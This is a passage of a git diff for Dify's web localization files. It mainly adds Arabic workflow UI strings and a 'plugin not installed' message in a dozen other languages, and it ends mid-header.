'تحديد', + }, + variableAssigner: { + title: 'تعيين المتغيرات', + outputType: 'نوع الإخراج', + varNotSet: 'المتغير غير معين', + noVarTip: 'أضف المتغيرات التي سيتم تعيينها', + type: { + string: 'سلسلة', + number: 'رقم', + object: 'كائن', + array: 'مصفوفة', + }, + aggregationGroup: 'مجموعة التجميع', + aggregationGroupTip: 'يسمح تمكين هذه الميزة لمجمع المتغيرات بتجميع مجموعات متعددة من المتغيرات.', + addGroup: 'إضافة مجموعة', + outputVars: { + varDescribe: 'إخراج {{groupName}}', + }, + setAssignVariable: 'تعيين متغير التعيين', + }, + assigner: { + 'assignedVariable': 'المتغير المعين', + 'varNotSet': 'المتغير غير معين', + 'variables': 'المتغيرات', + 'noVarTip': 'انقر على زر "+" لإضافة متغيرات', + 'writeMode': 'وضع الكتابة', + 'writeModeTip': 'وضع الإلحاق: متاح لمتغيرات المصفوفة فقط.', + 'over-write': 'الكتابة الفوقية', + 'append': 'إلحاق', + 'plus': 'إضافة', + 'clear': 'مسح', + 'setVariable': 'تعيين المتغير', + 'selectAssignedVariable': 'حدد المتغير المعين...', + 'setParameter': 'تعيين المعلمة...', + 'operations': { + 'title': 'عملية', + 'over-write': 'الكتابة الفوقية', + 'overwrite': 'الكتابة الفوقية', + 'set': 'تعيين', + 'clear': 'مسح', + 'extend': 'تمديد', + 'append': 'إلحاق', + 'remove-first': 'إزالة الأول', + 'remove-last': 'إزالة الأخير', + '+=': '+=', + '-=': '-=', + '*=': '*=', + '/=': '/=', + }, + 'variable': 'متغير', + 'noAssignedVars': 'لا توجد متغيرات معينة متاحة', + 'assignedVarsDescription': 'يجب أن تكون المتغيرات المعينة متغيرات قابلة للكتابة، مثل متغيرات المحادثة.', + }, + tool: { + authorize: 'تخويل', + inputVars: 'متغيرات الإدخال', + settings: 'الإعدادات', + insertPlaceholder1: 'اكتب أو اضغط', + insertPlaceholder2: 'لإدراج متغير', + outputVars: { + text: 'محتوى تم إنشاؤه بواسطة الأداة', + files: { + title: 'ملفات تم إنشاؤها بواسطة الأداة', + type: 'نوع الدعم. الآن يدعم الصورة فقط', + transfer_method: 'طريقة النقل. القيمة هي remote_url أو local_file', + url: 'رابط الصورة', + upload_file_id: 'معرف ملف التحميل', + }, + json: 'json تم إنشاؤه بواسطة الأداة', + }, + }, + triggerPlugin: { + authorized: 'مخول', + notConfigured: 'لم يتم التكوين', + notAuthorized: 'غير مخول', + selectSubscription: 'تصديق الاشتراك', + availableSubscriptions: 'الاشتراكات المتاحة', + addSubscription: 'إضافة اشتراك جديد', + removeSubscription: 'إزالة الاشتراك', + subscriptionRemoved: 'تمت إزالة الاشتراك بنجاح', + error: 'خطأ', + configuration: 'التكوين', + remove: 'إزالة', + or: 'أو', + useOAuth: 'استخدام OAuth', + useApiKey: 'استخدام مفتاح API', + authenticationFailed: 'فشلت المصادقة', + authenticationSuccess: 'نجحت المصادقة', + oauthConfigFailed: 'فشل تكوين OAuth', + configureOAuthClient: 'تكوين عميل OAuth', + oauthClientDescription: 'تكوين بيانات اعتماد عميل OAuth لتمكين المصادقة', + oauthClientSaved: 'تم حفظ تكوين عميل OAuth بنجاح', + configureApiKey: 'تكوين مفتاح API', + apiKeyDescription: 'تكوين بيانات اعتماد مفتاح API للمصادقة', + apiKeyConfigured: 'تم تكوين مفتاح API بنجاح', + configurationFailed: 'فشل التكوين', + failedToStart: 'فشل بدء تدفق المصادقة', + credentialsVerified: 'تم التحقق من بيانات الاعتماد بنجاح', + credentialVerificationFailed: 'فشل التحقق من بيانات الاعتماد', + verifyAndContinue: 'تحقق ومتابعة', + configureParameters: 'تكوين المعلمات', + parametersDescription: 'تكوين معلمات المشغل والخصائص', + configurationComplete: 'اكتمل التكوين', + configurationCompleteDescription: 'تم تكوين المشغل الخاص بك بنجاح', + configurationCompleteMessage: 'اكتمل تكوين المشغل الخاص بك الآن وهو جاهز للاستخدام.', + parameters: 'المعلمات', + properties: 'الخصائص', + propertiesDescription: 'خصائص تكوين إضافية لهذا المشغل', + noConfigurationRequired: 'لا يلزم تكوين إضافي لهذا المشغل.', + subscriptionName: 'اسم الاشتراك', + subscriptionNameDescription: 'أدخل اسمًا فريدًا لاشتراك المشغل هذا', + subscriptionNamePlaceholder: 'أدخل اسم الاشتراك...', + subscriptionNameRequired: 'اسم الاشتراك مطلوب', + subscriptionRequired: 'الاشتراك مطلوب', + }, + questionClassifiers: { + model: 'النموذج', + inputVars: 'متغيرات الإدخال', + outputVars: { + className: 'اسم الفئة', + usage: 'معلومات استخدام النموذج', + }, + class: 'فئة', + classNamePlaceholder: 'اكتب اسم الفئة الخاصة بك', + advancedSetting: 'إعدادات متقدمة', + topicName: 'اسم الموضوع', + topicPlaceholder: 'اكتب اسم الموضوع الخاص بك', + addClass: 'إضافة فئة', + instruction: 'تعليمات', + instructionTip: 'أدخل تعليمات إضافية لمساعدة مصنف الأسئلة على فهم كيفية تصنيف الأسئلة بشكل أفضل.', + instructionPlaceholder: 'اكتب تعليماتك', + }, + parameterExtractor: { + inputVar: 'متغير الإدخال', + outputVars: { + isSuccess: 'هو نجاح. عند النجاح تكون القيمة 1، عند الفشل تكون القيمة 0.', + errorReason: 'سبب الخطأ', + usage: 'معلومات استخدام النموذج', + }, + extractParameters: 'استخراج المعلمات', + importFromTool: 'استيراد من الأدوات', + addExtractParameter: 'إضافة معلمة استخراج', + addExtractParameterContent: { + name: 'الاسم', + namePlaceholder: 'اسم معلمة الاستخراج', + type: 'النوع', + typePlaceholder: 'نوع معلمة الاستخراج', + description: 'الوصف', + descriptionPlaceholder: 'وصف معلمة الاستخراج', + required: 'مطلوب', + requiredContent: 'مطلوب يستخدم فقط كمرجع لاستدلال النموذج، وليس للتحقق الإلزامي من إخراج المعلمة.', + }, + extractParametersNotSet: 'لم يتم إعداد استخراج المعلمات', + instruction: 'تعليمات', + instructionTip: 'أدخل تعليمات إضافية لمساعدة مستخرج المعلمات على فهم كيفية استخراج المعلمات.', + advancedSetting: 'إعدادات متقدمة', + reasoningMode: 'وضع التفكير', + reasoningModeTip: 'يمكنك اختيار وضع التفكير المناسب بناءً على قدرة النموذج على الاستجابة للتعليمات لاستدعاء الوظيفة أو المطالبات.', + }, + iteration: { + deleteTitle: 'حذف عقدة التكرار؟', + deleteDesc: 'سيؤدي حذف عقدة التكرار إلى حذف جميع العقد الفرعية', + input: 'إدخال', + output: 'متغيرات الإخراج', + iteration_one: '{{count}} تكرار', + iteration_other: '{{count}} تكرارات', + currentIteration: 'التكرار الحالي', + comma: '، ', + error_one: '{{count}} خطأ', + error_other: '{{count}} أخطاء', + parallelMode: 'الوضع المتوازي', + parallelModeUpper: 'الوضع المتوازي', + parallelModeEnableTitle: 'تم تمكين الوضع المتوازي', + parallelModeEnableDesc: 'في الوضع المتوازي، تدعم المهام داخل التكرارات التنفيذ المتوازي. يمكنك تكوين هذا في لوحة الخصائص على اليمين.', + parallelPanelDesc: 'في الوضع المتوازي، تدعم المهام في التكرار التنفيذ المتوازي.', + MaxParallelismTitle: 'الحد الأقصى للتوازي', + MaxParallelismDesc: 'يتم استخدام الحد الأقصى للتوازي للتحكم في عدد المهام التي يتم تنفيذها في وقت واحد في تكرار واحد.', + errorResponseMethod: 'طريقة استجابة الخطأ', + ErrorMethod: { + operationTerminated: 'تم الإنهاء', + continueOnError: 'متابعة عند الخطأ', + removeAbnormalOutput: 'إزالة الإخراج غير الطبيعي', + }, + answerNodeWarningDesc: 'تحذير الوضع المتوازي: قد تتسبب عقد الإجابة وتعيينات متغيرات المحادثة وعمليات القراءة/الكتابة الدائمة داخل التكرارات في حدوث استثناءات.', + flattenOutput: 'تسطيح الإخراج', + flattenOutputDesc: 'عند التمكين، إذا كانت جميع مخرجات التكرار مصفوفات، فسيتم تسطيحها في مصفوفة واحدة. عند التعطيل، ستحافظ المخرجات على هيكل مصفوفة متداخلة.', + }, + loop: { + deleteTitle: 'حذف عقدة الحلقة؟', + deleteDesc: 'سيؤدي حذف عقدة الحلقة إلى إزالة جميع العقد الفرعية', + input: 'إدخال', + output: 'متغير الإخراج', + loop_one: '{{count}} حلقة', + loop_other: '{{count}} حلقات', + currentLoop: 'الحلقة الحالية', + comma: '، ', + error_one: '{{count}} خطأ', + error_other: '{{count}} أخطاء', + breakCondition: 'شرط إنهاء الحلقة', + breakConditionTip: 'يمكن الإشارة فقط إلى المتغيرات داخل الحلقات ذات شروط الإنهاء ومتغيرات المحادثة.', + loopMaxCount: 'الحد الأقصى لعدد الحلقات', + loopMaxCountError: 'الرجاء إدخال حد أقصى صالح لعدد الحلقات، يتراوح بين 1 و {{maxCount}}', + errorResponseMethod: 'طريقة استجابة الخطأ', + ErrorMethod: { + operationTerminated: 'تم الإنهاء', + continueOnError: 'متابعة عند الخطأ', + removeAbnormalOutput: 'إزالة الإخراج غير الطبيعي', + }, + loopVariables: 'متغيرات الحلقة', + initialLoopVariables: 'متغيرات الحلقة الأولية', + finalLoopVariables: 'متغيرات الحلقة النهائية', + setLoopVariables: 'تعيين المتغيرات داخل نطاق الحلقة', + variableName: 'اسم المتغير', + inputMode: 'وضع الإدخال', + exitConditionTip: 'تحتاج عقدة الحلقة إلى شرط خروج واحد على الأقل', + loopNode: 'عقدة الحلقة', + currentLoopCount: 'عدد الحلقات الحالي: {{count}}', + totalLoopCount: 'إجمالي عدد الحلقات: {{count}}', + }, + note: { + addNote: 'إضافة ملاحظة', + editor: { + placeholder: 'اكتب ملاحظتك...', + small: 'صغير', + medium: 'متوسط', + large: 'كبير', + bold: 'غامق', + italic: 'مائل', + strikethrough: 'يتوسطه خط', + link: 'رابط', + openLink: 'فتح', + unlink: 'إلغاء الرابط', + enterUrl: 'أدخل URL...', + invalidUrl: 'URL غير صالح', + bulletList: 'قائمة نقطية', + showAuthor: 'عرض المؤلف', + }, + }, + docExtractor: { + inputVar: 'متغير الإدخال', + outputVars: { + text: 'نص مستخرج', + }, + supportFileTypes: 'أنواع الملفات المدعومة: {{types}}.', learnMore: 'تعرف على المزيد', - aboutStartNode: 'حول عقدة البداية.', - escTip: { - press: 'اضغط', - key: 'esc', - toDismiss: 'للرفض', + }, + listFilter: { + inputVar: 'متغير الإدخال', + filterCondition: 'شرط التصفية', + filterConditionKey: 'مفتاح شرط التصفية', + extractsCondition: 'استخراج العنصر N', + filterConditionComparisonOperator: 'مشغل مقارنة شرط التصفية', + filterConditionComparisonValue: 'قيمة شرط التصفية', + selectVariableKeyPlaceholder: 'حدد مفتاح المتغير الفرعي', + limit: 'أعلى N', + orderBy: 'ترتيب حسب', + asc: 'ASC', + desc: 'DESC', + outputVars: { + result: 'نتيجة التصفية', + first_record: 'السجل الأول', + last_record: 'السجل الأخير', }, }, - } + agent: { + strategy: { + label: 'استراتيجية الوكيل', + tooltip: 'تحدد استراتيجيات الوكيل المختلفة كيفية تخطيط النظام وتنفيذ استدعاءات الأدوات متعددة الخطوات', + shortLabel: 'استراتيجية', + configureTip: 'يرجى تكوين استراتيجية الوكيل.', + configureTipDesc: 'بعد تكوين استراتيجية الوكيل، ستقوم هذه العقدة تلقائيًا بتحميل التكوينات المتبقية. ستؤثر الاستراتيجية على آلية التفكير في الأدوات متعددة الخطوات. ', + selectTip: 'حدد استراتيجية الوكيل', + searchPlaceholder: 'بحث في استراتيجية الوكيل', + }, + learnMore: 'تعرف على المزيد', + pluginNotInstalled: 'هذا الملحق غير مثبت', + pluginNotInstalledDesc: 'تم تثبيت هذا الملحق من GitHub. يرجى الانتقال إلى الملحقات لإعادة التثبيت', + linkToPlugin: 'رابط للإضافات', + pluginInstaller: { + install: 'تثبيت', + installing: 'جاري التثبيت', + }, + modelNotInMarketplace: { + title: 'النموذج غير مثبت', + desc: 'تم تثبيت هذا النموذج من مستودع محلي أو GitHub. الرجاء استخدامه بعد التثبيت.', + manageInPlugins: 'إدارة في الإضافات', + }, + modelNotSupport: { + title: 'نموذج غير مدعوم', + desc: 'لا يوفر إصدار الملحق المثبت هذا النموذج.', + descForVersionSwitch: 'لا يوفر إصدار الملحق المثبت هذا النموذج. انقر لتبديل الإصدار.', + }, + configureModel: 'تكوين النموذج', + notAuthorized: 'غير مخول', + model: 'النموذج', + toolbox: 'صندوق الأدوات', + strategyNotSet: 'لم يتم تعيين استراتيجية الوكيل', + tools: 'الأدوات', + maxIterations: 'الحد الأقصى للتكرارات', + modelNotSelected: 'النموذج غير محدد', + modelNotInstallTooltip: 'هذا النموذج غير مثبت', + toolNotInstallTooltip: '{{tool}} غير مثبت', + toolNotAuthorizedTooltip: '{{tool}} غير مخول', + strategyNotInstallTooltip: '{{strategy}} غير مثبتة', + unsupportedStrategy: 'استراتيجية غير مدعومة', + pluginNotFoundDesc: 'تم تثبيت هذا الملحق من GitHub. يرجى الانتقال إلى الملحقات لإعادة التثبيت', + strategyNotFoundDesc: 'لا يوفر إصدار الملحق المثبت هذه الاستراتيجية.', + strategyNotFoundDescAndSwitchVersion: 'لا يوفر إصدار الملحق المثبت هذه الاستراتيجية. انقر لتبديل الإصدار.', + modelSelectorTooltips: { + deprecated: 'تم إهمال هذا النموذج', + }, + outputVars: { + text: 'محتوى تم إنشاؤه بواسطة الوكيل', + usage: 'معلومات استخدام النموذج', + files: { + title: 'ملفات تم إنشاؤها بواسطة الوكيل', + type: 'نوع الدعم. الآن يدعم الصورة فقط', + transfer_method: 'طريقة النقل. القيمة هي remote_url أو local_file', + url: 'رابط الصورة', + upload_file_id: 'معرف ملف التحميل', + }, + json: 'json تم إنشاؤه بواسطة الوكيل', + }, + checkList: { + strategyNotSelected: 'الاستراتيجية غير محددة', + }, + installPlugin: { + title: 'تثبيت الإضافة', + desc: 'على وشك تثبيت الإضافة التالية', + changelog: 'سجل التغييرات', + install: 'تثبيت', + cancel: 'إلغاء', + }, + clickToViewParameterSchema: 'انقر لعرض مخطط المعلمة', + parameterSchema: 'مخطط المعلمة', + }, + dataSource: { + supportedFileFormats: 'تنسيقات الملفات المدعومة', + supportedFileFormatsPlaceholder: 'امتداد الملف، مثل doc', + add: 'إضافة مصدر بيانات', + }, + knowledgeBase: { + chunkStructure: 'هيكل القطعة', + chooseChunkStructure: 'اختر هيكل القطعة', + chunkStructureTip: { + title: 'الرجاء اختيار هيكل القطعة', + message: 'تدعم قاعدة المعرفة Dify ثلاثة هياكل للقطع: عام، وأصل-طفل، وسؤال وجواب. يمكن أن يكون لكل قاعدة معرفة هيكل واحد فقط. يجب أن يتوافق الإخراج من العقدة السابقة مع هيكل القطعة المحدد. لاحظ أن اختيار هيكل القطع يؤثر على طرق الفهرسة المتاحة.', + learnMore: 'تعرف على المزيد', + }, + changeChunkStructure: 'تغيير هيكل القطعة', + chunksInput: 'القطع', + chunksInputTip: 'متغير الإدخال لعقدة قاعدة المعرفة هو Pieces. نوع المتغير هو كائن بمخطط JSON محدد يجب أن يكون متسقًا مع هيكل القطعة المحدد.', + aboutRetrieval: 'حول طريقة الاسترجاع.', + chunkIsRequired: 'هيكل القطعة مطلوب', + indexMethodIsRequired: 'طريقة الفهرسة مطلوبة', + chunksVariableIsRequired: 'متغير القطع مطلوب', + embeddingModelIsRequired: 'نموذج التضمين مطلوب', + embeddingModelIsInvalid: 'نموذج التضمين غير صالح', + retrievalSettingIsRequired: 'إعداد الاسترجاع مطلوب', + rerankingModelIsRequired: 'نموذج إعادة الترتيب مطلوب', + rerankingModelIsInvalid: 'نموذج إعادة الترتيب غير صالح', + }, + triggerSchedule: { + title: 'الجدول الزمني', + nodeTitle: 'جدولة المشغل', + notConfigured: 'لم يتم التكوين', + useCronExpression: 'استخدم تعبير cron', + useVisualPicker: 'استخدم منتقي مرئي', + frequency: { + label: 'التكرار', + hourly: 'كل ساعة', + daily: 'يوميًا', + weekly: 'أسبوعيًا', + monthly: 'شهريًا', + }, + selectFrequency: 'حدد التكرار', + frequencyLabel: 'التكرار', + nextExecution: 'التنفيذ التالي', + weekdays: 'أيام الأسبوع', + time: 'الوقت', + cronExpression: 'تعبير Cron', + nextExecutionTime: 'وقت التنفيذ التالي', + nextExecutionTimes: 'أوقات التنفيذ الـ 5 التالية', + startTime: 'وقت البدء', + executeNow: 'التنفيذ الآن', + selectDateTime: 'حدد التاريخ والوقت', + hours: 'الساعات', + minutes: 'الدقائق', + onMinute: 'في الدقيقة', + days: 'الأيام', + lastDay: 'اليوم الأخير', + lastDayTooltip: 'ليست كل الأشهر 31 يومًا. استخدم خيار "اليوم الأخير" لتحديد اليوم الأخير من كل شهر.', + mode: 'الوضع', + timezone: 'المنطقة الزمنية', + visualConfig: 'التكوين المرئي', + monthlyDay: 'يوم شهري', + executionTime: 'وقت التنفيذ', + invalidTimezone: 'منطقة زمنية غير صالحة', + invalidCronExpression: 'تعبير cron غير صالح', + noValidExecutionTime: 'لا يمكن حساب وقت تنفيذ صالح', + executionTimeCalculationError: 'فشل حساب أوقات التنفيذ', + invalidFrequency: 'تكرار غير صالح', + invalidStartTime: 'وقت البدء غير صالح', + startTimeMustBeFuture: 'يجب أن يكون وقت البدء في المستقبل', + invalidTimeFormat: 'تنسيق الوقت غير صالح (المتوقع HH:MM AM/PM)', + invalidWeekday: 'يوم أسبوع غير صالح: {{weekday}}', + invalidMonthlyDay: 'يجب أن يكون اليوم الشهري بين 1-31 أو "last"', + invalidOnMinute: 'يجب أن تكون الدقيقة بين 0-59', + invalidExecutionTime: 'وقت التنفيذ غير صالح', + executionTimeMustBeFuture: 'يجب أن يكون وقت التنفيذ في المستقبل', + }, + triggerWebhook: { + title: 'مشغل Webhook', + nodeTitle: '🔗 مشغل Webhook', + configPlaceholder: 'سيتم تنفيذ تكوين مشغل webhook هنا', + webhookUrl: 'Webhook URL', + webhookUrlPlaceholder: 'انقر فوق إنشاء لإنشاء عنوان URL لـ webhook', + generate: 'توليد', + copy: 'نسخ', + test: 'اختبار', + urlGenerated: 'تم إنشاء عنوان URL لـ webhook بنجاح', + urlGenerationFailed: 'فشل إنشاء عنوان URL لـ webhook', + urlCopied: 'تم نسخ عنوان URL إلى الحافظة', + method: 'الطريقة', + contentType: 'نوع المحتوى', + queryParameters: 'معلمات الاستعلام', + headerParameters: 'معلمات الرأس', + requestBodyParameters: 'معلمات جسم الطلب', + parameterName: 'اسم المتغير', + varName: 'اسم المتغير', + varType: 'النوع', + varNamePlaceholder: 'أدخل اسم المتغير...', + required: 'مطلوب', + addParameter: 'إضافة', + addHeader: 'إضافة', + noParameters: 'لم يتم تكوين أي معلمات', + noQueryParameters: 'لم يتم تكوين أي معلمات استعلام', + noHeaders: 'لم يتم تكوين أي رؤوس', + noBodyParameters: 'لم يتم تكوين أي معلمات جسم', + debugUrlTitle: 'للتشغيل الاختياري، استخدم دائمًا هذا العنوان', + debugUrlCopy: 'انقر للنسخ', + debugUrlCopied: 'تم النسخ!', + debugUrlPrivateAddressWarning: 'يبدو أن عنوان URL هذا عنوان داخلي، مما قد يتسبب في فشل طلبات webhook. يمكنك تغيير TRIGGER_URL إلى عنوان عام.', + errorHandling: 'معالجة الأخطاء', + errorStrategy: 'معالجة الأخطاء', + responseConfiguration: 'استجابة', + asyncMode: 'وضع غير متزامن', + statusCode: 'رمز الحالة', + responseBody: 'جسم الاستجابة', + responseBodyPlaceholder: 'اكتب جسم الاستجابة هنا', + headers: 'الرؤوس', + validation: { + webhookUrlRequired: 'عنوان URL لـ Webhook مطلوب', + invalidParameterType: 'نوع المعلمة غير صالح "{{type}}" للمعلمة "{{name}}"', + }, + }, + }, + triggerStatus: { + enabled: 'مشغل', + disabled: 'مشغل • معطل', + }, + entryNodeStatus: { + enabled: 'بدء', + disabled: 'بدء • معطل', + }, + tracing: { + stopBy: 'توقف بواسطة {{user}}', + }, + versionHistory: { + title: 'الإصدارات', + currentDraft: 'المسودة الحالية', + latest: 'الأحدث', + filter: { + all: 'الكل', + onlyYours: 'الخاص بك فقط', + onlyShowNamedVersions: 'إظهار الإصدارات المسماة فقط', + reset: 'إعادة تعيين التصفية', + empty: 'لم يتم العثور على سجل إصدار مطابق', + }, + defaultName: 'إصدار بدون عنوان', + nameThisVersion: 'تسمية هذا الإصدار', + editVersionInfo: 'تعديل معلومات الإصدار', + copyId: 'نسخ المعرف', + editField: { + title: 'العنوان', + releaseNotes: 'ملاحظات الإصدار', + titleLengthLimit: 'لا يمكن أن يتجاوز العنوان {{limit}} حرفًا', + releaseNotesLengthLimit: 'لا يمكن أن تتجاوز ملاحظات الإصدار {{limit}} حرفًا', + }, + releaseNotesPlaceholder: 'صف ما تغير', + restorationTip: 'بعد استعادة الإصدار، سيتم استبدال المسودة الحالية.', + deletionTip: 'الحذف لا رجعة فيه، يرجى التأكد.', + action: { + restoreSuccess: 'تم استعادة الإصدار', + restoreFailure: 'فشل استعادة الإصدار', + deleteSuccess: 'تم حذف الإصدار', + deleteFailure: 'فشل حذف الإصدار', + updateSuccess: 'تم تحديث الإصدار', + updateFailure: 'فشل تحديث الإصدار', + copyIdSuccess: 'تم نسخ المعرف إلى الحافظة', + }, + }, + debug: { + settingsTab: 'الإعدادات', + lastRunTab: 'آخر تشغيل', + relationsTab: 'العلاقات', + copyLastRun: 'نسخ آخر تشغيل', + noLastRunFound: 'لم يتم العثور على تشغيل سابق', + noMatchingInputsFound: 'لم يتم العثور على مدخلات مطابقة من آخر تشغيل', + lastRunInputsCopied: 'تم نسخ {{count}} إدخال (إدخالات) من آخر تشغيل', + copyLastRunError: 'فشل نسخ مدخلات آخر تشغيل', + noData: { + description: 'سيتم عرض نتائج آخر تشغيل هنا', + runThisNode: 'تشغيل هذه العقدة', + }, + variableInspect: { + title: 'فحص المتغير', + emptyTip: 'بعد تخطي عقدة على اللوحة أو تشغيل عقدة خطوة بخطوة، يمكنك عرض القيمة الحالية لمتغير العقدة في فحص المتغير', + emptyLink: 'تعرف على المزيد', + clearAll: 'إعادة تعيين الكل', + clearNode: 'مسح المتغير المخبأ', + resetConversationVar: 'إعادة تعيين متغير المحادثة إلى القيمة الافتراضية', + view: 'عرض السجل', + edited: 'تم التعديل', + reset: 'إعادة تعيين إلى قيمة آخر تشغيل', + listening: { + title: 'الاستماع للأحداث من المشغلات...', + tip: 'يمكنك الآن محاكاة مشغلات الحدث عن طريق إرسال طلبات اختبار إلى نقطة نهاية HTTP {{nodeName}} أو استخدامها كعنوان URL لرد الاتصال لتصحيح أخطاء الحدث المباشر. يمكن عرض جميع المخرجات مباشرة في فحص المتغير.', + tipPlugin: 'الآن يمكنك إنشاء أحداث في {{- pluginName}}، واسترجاع المخرجات من هذه الأحداث في فحص المتغير.', + tipSchedule: 'الاستماع للأحداث من مشغلات الجدول.\nالتشغيل المجدول التالي: {{nextTriggerTime}}', + tipFallback: 'انتظار أحداث المشغل الواردة. ستظهر المخرجات هنا.', + defaultNodeName: 'هذا المشغل', + defaultPluginName: 'مشغل الإضافة هذا', + defaultScheduleTime: 'لم يتم التكوين', + selectedTriggers: 'المشغلات المحددة', + stopButton: 'توقف', + }, + trigger: { + normal: 'فحص المتغير', + running: 'التخزين المؤقت لحالة التشغيل', + stop: 'إيقاف التشغيل', + cached: 'عرض المتغيرات المخبأة', + clear: 'مسح', + }, + envNode: 'البيئة', + chatNode: 'المحادثة', + systemNode: 'النظام', + exportToolTip: 'تصدير متغير كملف', + largeData: 'بيانات كبيرة، معاينة للقراءة فقط. تصدير لعرض الكل.', + largeDataNoExport: 'بيانات كبيرة - معاينة جزئية فقط', + export: 'تصدير', + }, + lastOutput: 'آخر إخراج', + relations: { + dependencies: 'التبعيات', + dependents: 'المعتمدون', + dependenciesDescription: 'العقد التي تعتمد عليها هذه العقدة', + dependentsDescription: 'العقد التي تعتمد على هذه العقدة', + noDependencies: 'لا توجد تبعيات', + noDependents: 'لا يوجد معتمدون', + }, + }, + onboarding: { + title: 'حدد عقدة البداية للبدء', + description: 'لدى عقد البداية المختلفة قدرات مختلفة. لا تقلق، يمكنك دائمًا تغييرها لاحقًا.', + userInputFull: 'إدخال المستخدم (عقدة البداية الأصلية)', + userInputDescription: 'عقدة البداية التي تسمح بتعيين متغيرات إدخال المستخدم، مع إمكانيات تطبيق الويب، وواجهة برمجة تطبيقات الخدمة، وخادم MCP، وقدرات سير العمل كأداة.', + trigger: 'مشغل', + triggerDescription: 'يمكن أن تعمل المشغلات كعقدة بداية لسير العمل، مثل المهام المجدولة، أو خطافات الويب المخصصة، أو التكامل مع تطبيقات أخرى.', + back: 'رجوع', + learnMore: 'تعرف على المزيد', + aboutStartNode: 'حول عقدة البداية.', + escTip: { + press: 'اضغط', + key: 'esc', + toDismiss: 'للرفض', + }, + }, +} export default translation diff --git a/web/i18n/de-DE/workflow.ts b/web/i18n/de-DE/workflow.ts index 61a1750ae5..d670d97d5b 100644 --- a/web/i18n/de-DE/workflow.ts +++ b/web/i18n/de-DE/workflow.ts @@ -437,6 +437,7 @@ const translation = { variable: 'Verwende die Variable', }, inputVars: 'Eingabevariablen', + pluginNotInstalled: 'Plugin ist nicht installiert', }, start: { required: 'erforderlich', diff --git a/web/i18n/en-US/workflow.ts b/web/i18n/en-US/workflow.ts index 54cd70ef19..a023ac2b91 100644 --- a/web/i18n/en-US/workflow.ts +++ b/web/i18n/en-US/workflow.ts @@ -464,6 +464,7 @@ const translation = { variable: 'Use variable', }, inputVars: 'Input Variables', + pluginNotInstalled: 'Plugin is not installed', }, start: { required: 'required', diff --git a/web/i18n/es-ES/workflow.ts b/web/i18n/es-ES/workflow.ts index f81beb40ba..ab853882f5 100644 --- a/web/i18n/es-ES/workflow.ts +++ b/web/i18n/es-ES/workflow.ts @@ -437,6 +437,7 @@ const translation = { variable: 'Usa la variable', }, inputVars: 'Variables de entrada', + pluginNotInstalled: 'El complemento no está instalado', }, start: { required: 'requerido', diff --git a/web/i18n/fa-IR/workflow.ts b/web/i18n/fa-IR/workflow.ts index 2a2ec69248..a2a83acdfb 100644 --- a/web/i18n/fa-IR/workflow.ts +++ b/web/i18n/fa-IR/workflow.ts @@ -437,6 +437,7 @@ const translation = { variable: 'از متغیر استفاده کن', }, inputVars: 'متغیرهای ورودی', + pluginNotInstalled: 'افزونه نصب نشده است', }, start: { required: 'الزامی', diff --git a/web/i18n/fr-FR/workflow.ts b/web/i18n/fr-FR/workflow.ts index cf69831d08..e22385c17e 100644 --- a/web/i18n/fr-FR/workflow.ts +++ b/web/i18n/fr-FR/workflow.ts @@ -437,6 +437,7 @@ const translation = { variable: 'Utilisez une variable', }, inputVars: 'Variables d’entrée', + pluginNotInstalled: 'Le plugin n\'est pas installé', }, start: { required: 'requis', diff --git a/web/i18n/hi-IN/workflow.ts b/web/i18n/hi-IN/workflow.ts index 53caff1866..9f5c9828cd 100644 --- a/web/i18n/hi-IN/workflow.ts +++ b/web/i18n/hi-IN/workflow.ts @@ -449,6 +449,7 @@ const translation = { variable: 'चर का प्रयोग करें', }, inputVars: 'इनपुट चर', + pluginNotInstalled: 'प्लगइन इंस्टॉल नहीं है', }, start: { required: 'आवश्यक', diff --git a/web/i18n/id-ID/workflow.ts b/web/i18n/id-ID/workflow.ts index 3928916e0b..887650ec2f 100644 --- a/web/i18n/id-ID/workflow.ts +++ b/web/i18n/id-ID/workflow.ts @@ -444,6 +444,7 @@ const translation = { insertVarTip: 'Sisipkan Variabel', outputVars: 'Variabel Keluaran', inputVars: 'Variabel Masukan', + pluginNotInstalled: 'Plugin tidak terpasang', }, start: { outputVars: { diff --git a/web/i18n/it-IT/workflow.ts b/web/i18n/it-IT/workflow.ts index 3af7741e3e..33aef2cea0 100644 --- a/web/i18n/it-IT/workflow.ts +++ b/web/i18n/it-IT/workflow.ts @@ -452,6 +452,7 @@ const translation = { variable: 'Usa la variabile', }, inputVars: 'Variabili di input', + pluginNotInstalled: 'Il plugin non è installato', }, start: { required: 'richiesto', diff --git a/web/i18n/ja-JP/workflow.ts b/web/i18n/ja-JP/workflow.ts index 73be14b009..7f4e7a3009 100644 --- a/web/i18n/ja-JP/workflow.ts +++ b/web/i18n/ja-JP/workflow.ts @@ -464,6 +464,7 @@ const translation = { variable: '変数を使用する', }, inputVars: '入力変数', + pluginNotInstalled: 'プラグインがインストールされていません', }, start: { required: '必須', diff --git a/web/i18n/ko-KR/workflow.ts b/web/i18n/ko-KR/workflow.ts index 44b45a7160..964f331c85 100644 --- a/web/i18n/ko-KR/workflow.ts +++ b/web/i18n/ko-KR/workflow.ts @@ -461,6 +461,7 @@ const translation = { variable: '변수를 사용하세요', }, inputVars: '입력 변수', + pluginNotInstalled: '플러그인이 설치되지 않았습니다', }, start: { required: '필수', diff --git a/web/i18n/pl-PL/workflow.ts b/web/i18n/pl-PL/workflow.ts index 61adafbef9..3ddb1ce69b 100644 --- a/web/i18n/pl-PL/workflow.ts +++ b/web/i18n/pl-PL/workflow.ts @@ -437,6 +437,7 @@ const translation = { input: 'Wartość wejściowa', }, inputVars: 'Zmienne wejściowe', + pluginNotInstalled: 'Wtyczka nie jest zainstalowana', }, start: { required: 'wymagane', diff --git a/web/i18n/pt-BR/workflow.ts b/web/i18n/pt-BR/workflow.ts index 20c03e8a90..240635dd4e 100644 --- a/web/i18n/pt-BR/workflow.ts +++ b/web/i18n/pt-BR/workflow.ts @@ -437,6 +437,7 @@ const translation = { input: 'Valor de entrada', }, inputVars: 'Variáveis de entrada', + pluginNotInstalled: 'O plugin não está instalado', }, start: { required: 'requerido', diff --git a/web/i18n/ro-RO/workflow.ts b/web/i18n/ro-RO/workflow.ts index d56992e416..a542a18807 100644 --- a/web/i18n/ro-RO/workflow.ts +++ b/web/i18n/ro-RO/workflow.ts @@ -437,6 +437,7 @@ const translation = { input: 'Valoare de intrare', }, inputVars: 'Variabile de intrare', + pluginNotInstalled: 'Pluginul nu este instalat', }, start: { required: 'necesar', diff --git a/web/i18n/ru-RU/workflow.ts 